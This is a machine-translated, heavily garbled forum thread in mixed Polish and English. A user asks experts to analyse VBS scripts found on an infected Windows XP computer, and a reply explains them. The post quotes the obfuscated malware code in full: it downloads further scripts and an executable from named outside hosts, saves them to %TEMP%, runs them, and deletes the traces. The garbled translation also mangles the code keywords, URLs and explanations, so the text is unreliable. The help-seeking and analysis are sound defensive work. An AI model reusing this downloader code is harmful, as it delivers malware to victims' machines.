Pytanie : Móc ekspert próba ten VBS kod

Cześć experts

A przyjaciel widzieć niektóre niezwykły zachowanie z jej Windows XP SP3 IE7 komputer nad the past para dzień który I być głęboko podejrzany.  I obserwować ono nad VNC związek właśnie krótki czas ago.

A CMD.EXE nadokienny wystrzał nadokienny i oczywiście waits.
A VBS kartoteka otwierać w Notepad.
When Notepad zamykać, the CMD okno closes.

I am dosyć pewny że to być złośliwy pismo the VBS kartoteka bez the program (CScript lub WScript) ono, i ponieważ I ustawiać the brak akcja dla najwięcej "pismo" typ kartoteka typ the "Redagować" akcja (Notepad) raczej the "Otwarty" jeden (wykonywać pismo), the złośliwy aktywność być prawdopodobnie failing.

On the pierwszy okazja który I poświadczać, the kartoteka "yb.vbs" otwierać w Notepad od the użytkownik %TEMP% falcówka z the następujący zawartość:

1:

B= " yb.vbs ": Z CreateObject ("MSXML2.XMLHTTP"): .open "DOSTAWAĆ", "http://jyiop.com/kr/yb.vbs", fałszywy: .send (): Ustawiać A = CreateObject ("Scripting.FileSystemObject"): Ustawiać D=A.CreateTextFile (A.GetSpecialFolder (2) +" \ "+ B): D.WriteLine .responseText: Końcówka Z: D.Close: CreateObject ("WScript.Shell"). Bieg A.GetSpecialFolder (2) +" \ "+ B

I bezpiecznie ściągać " http://jyiop.com/kr/yb.vb s" i saw że the zawartość być ściągać "ściągać"/>I the parametr pokazywać pokazywać:

1: 2: 3: 4: 5: 6: 7: 8:

w=3000: x=200: y=1: z=false: a = "http://jyiop.com/kr/hy/_q.php?&": Set e = Createobject (StrReverse ("tcejbOmetsySeliF.gnitpircS")): B = e.GetSpecialFolder (2) &" \ exe.exe ": OT = "DOSTAWAĆ": Set c = CreateObject (StrReverse ("PTTHLMX.2LMXSM")): Ustalony D = CreateObject (StrReverse ("maertS.BDODA")) Ustalony o=Createobject (StrReverse ("tcejbOmetsySeliF.gnitpircS")) Na Błąd życiorys następnie c.open OT, a, z: c.send () Jeżeli c.Status = x Wtedy u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile B: d.Close Kończyć Jeżeli CreateObject (StrReverse ("llehS.tpircSW")).eXeC B: CreateObject (StrReverse ("llehS.tpircSW")).eXeC "taskkill /F /IM wmplayer.exe": Set g=o.GetFile (e.GetSpecialFolder (2) &" \ "& StrReverse ("sbv.by")): g.Delete: WScript.Sleep w: Set g=o.GetFile (B): g.Delete

I bezpiecznie ściągać the odnosić się " http://jyiop.com/kr/hy/_q .php" ten kod:

1:

I znać że ono być zawsze ewentualny *.php kartoteka od serwer nietknięty normalny środek (ie. Robić połączenie ono i Right-Click > Oprócz Cel > oprócz gdy *.htm kartoteka ten sam imię) i z the właściwy kod, tak, że móc właśnie the serwer odpowiedź mój próba the file.

Assuming the krewny URL utożsamiać:   http://jyiop.com/kr/_yoyk. php
then który rozwiązywać http://www.google.com
I am http://www.google.co.uk jako the strona domowa, więc I znać że ono właśnie redirecting mój dom page.

On the natępny okazja który I poświadczać nad VNC rozkaz oczywiście wydawać the kartoteka "uor.vbs" od the użytkownik %TEMP% falcówka w nakazowy okno, i notatnik strzelać w górę the pismo:

1:

B= " uor.vbs ": Z CreateObject ("MSXML2.XMLHTTP"): .open "DOSTAWAĆ", "http://ypuii.com/k_/uor.vbs", fałszywy: .send (): Ustawiać A = CreateObject ("Scripting.FileSystemObject"): Ustawiać D=A.CreateTextFile (A.GetSpecialFolder (2) +" \ "+ B): D.WriteLine .responseText: Końcówka Z: D.Close: CreateObject ("WScript.Shell"). Bieg A.GetSpecialFolder (2) +" \ "+ B

Safely ściąganie i otwarcie " http://ypuii.com/k_/uor.v bs" w tekst redaktor wyjawiać the to samo przed, ie. odwracać strings.

Now, I znajdować że "GetSpecialFolder (2)" nawiązywać do the użytkownik %TEMP% falcówka, i I móc że the pismo ściągać the VBS kartoteka, VBScript dalej - the - latać concatenating strunowanie i odwracać strunowanie, ale I być niepewny dokładnie pismo jak być robić lub próbować do.

I am bardzo obznajomiony z VBS nie niektóre podstawowy użycie, więc the następujący odnosić się być łamigłówka:

maertS.BDODA = ADOBD.Stream

c.open OT, a, z: c.send ()
If c.Status = x Then
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile B: d.Close

I móc równie równina dzień że Windows Media Gracz zabijać daleko jeżeli ono biegać (che ono być przy the materialny czas), ale I zastanawiać się dlaczego pismo robić this.

One inny najwyraźniej znaczący zagadnienie być że I odkrywać "ostatnio pisać na maszynie URL" w the użytkownik IE Adres Bar pisać na maszynie lista:
http://ypuii.com/k_/zcus/e fmjcg.pdf
I móc że kartoteka wyszukiwarka gdziekolwiek na the użytkownik komputer i ona móc nawet kiedy ona miewać ostatni otwierać PDF kartoteka w jej wyszukiwarka.  I ratować że PDF kartoteka i, na inspekcja w tekst redaktor, I móc niektóre tekst zawartość niektóre jakby wcześniej przygotowany kod i odniesienie "JavaScript".  The następujący być także jasny w tekst redaktor:

/Author (MllZTgg yZ=ssA f V)
/gZ (. B LPD tv/-Xqrf4dY3M s_JUNCVZa #8l=z 96yp2x: S5Rm k o 0&uFOcj% ihwBQn E K7gATGe H? I1W)
/Title (Ng JGgG qgMpr#AZMZH?)
/Keywords (Mokomeuapaualimajsi)
/Creator (Kotefekjoesito)
/ModDate (D: 20100621095906)
/Producer (820d5Deawohigejoxamogoga)

Googling właśnie the "Twórca" imię "Kotefekjoesito" brać ten strona:
http://jsunpack.jeek.org/d ec/go? report=c4cc162b45e937762035f286406a989f2adf2753
where ono wyraźnie pokazywać że the kartoteka być Malicious.

I móc tylko że the wczesny odniesienie w the VBScript "ADOBD.Stream" być odniesienie "Adobe", i strumień w wczesny wykonywać ręcznie PDF kartoteka.  I móc tylko że móc być lub the początek the zagadnienie, lub że ono być kartoteka przynosić złośliwy pismo, ale I myśleć ono dodawać the URL the ostatnio pisać na maszynie URL lista.  Być intrygować w itself.

Probably nie zbieg okoliczności być że googling StrReverse ("maertS.BDODA " ) także brać the " http://jsunpack.jeek.org " miejsce z ten strona:
http://jsunpack.jeek.org/d ec/go? report=5d7727607489f01840f34855c5664e662488962e
but ono mówić który być malicious.

Could odnosić się the VBS kartoteka w the registry.

Thanks w advance

Bill

Odpowiedź : Móc ekspert próba ten VBS kod

I być widzieć tak daleko jak the strona internetowa ty wspominać, od the pismo widzieć tutaj być co I widzieć…

Pismo (1) tworzyć pusty kartoteka, połączenie strona internetowa i ściąganie the zawartość the strona i usyp ono w the pusty kartoteka.  Ten kartoteka ratować "yb.vbs" i przypuszczać.
-------------------------------------------------------------------
B= " yb.vbs "
Z CreateObject ("MSXML2.XMLHTTP")
      .open "DOSTAWAĆ", "http://jyiop.com/kr/yb.vbs", fałszywy
      .send ()
      Ustawiać A = CreateObject ("Scripting.FileSystemObject")
      Ustawiać D = A.CreateTextFile (A.GetSpecialFolder (2) + "\" + B)
      D.WriteLine .responseText
Końcówka Z
D.Close
CreateObject ("WScript.Shell"). Bieg A.GetSpecialFolder (2) +" \ "+ B
-------------------------------------------------------------------
Kroczyć 2 Teraz gdy the vbs kartoteka tworzyć i biegać, ono próbować inny webpage ale ten czas ratować the strona internetowa zawartość w kartoteka dzwonić "exe.exe".  Ten nowy kartoteka być ratować w the użytkownik zastępca falcówka.
The pismo wtedy biegać the kartoteka "exe.exe".
Jako ty wspominać, taskkill przerwa Windows Media gracz - dlaczego, kto znać?!?!
The pismo wtedy kasować the vb pismo który krok (1) tworzyć (the pismo który obecnie biegać).
Tam  być 3 drugi czekanie wtedy the kartoteka "exe.exe" kasować.

Ten część;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Jeżeli c.Status = x Wtedy
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile B: d.Close]
być the pismo kartoteka che lać się w the webpage - być z Adobe.  "c.Status" - the pismo czekać the webpage przygotowywać i dysponowany. "u=c.ResponseBody" brać the strona internetowa i wtykać ono w zmienna.  The strumień otwierać i the tekst ściągać w the zmienna.  The kartoteka ratować i zamykać.  W ten pismo the webpage/kartoteka ratować w the zastępca falcówka "exe.exe".

The istny niebezpieczeństwo być że "exe.exe" kartoteka.  Jak Tylko ono biegać, tam  być żadny, ono projektować.

Ten komputer wciąż infekować z wirus.  The program "exe.exe" móc inny wirus w the tło obraz cyfrowy the system.  The fact że ty móc the nakazowy okno otwarty i the pismo próbować mówić tam  być niektóre złośliwy kartoteka wciąż.

Ono móc czas jaki potrzeba ratować od ten maszyna i zaczynać na nowo z re-install Windows i zastosowanie.  Ono brzmieć dramatyczny ale widzieć gdy the antivirus wykrywać dramatyczny z rodzaj I myśleć ty być w punkcie żadny powrót.  Pamiętać że dopóki the złośliwy kod być dalej tam, dalej jechać; być ono USB pamięć kij, kamera Etc., móc potencjalnie the wirusowy/Trojańczyk, jeżeli ono dołączać the maszyna.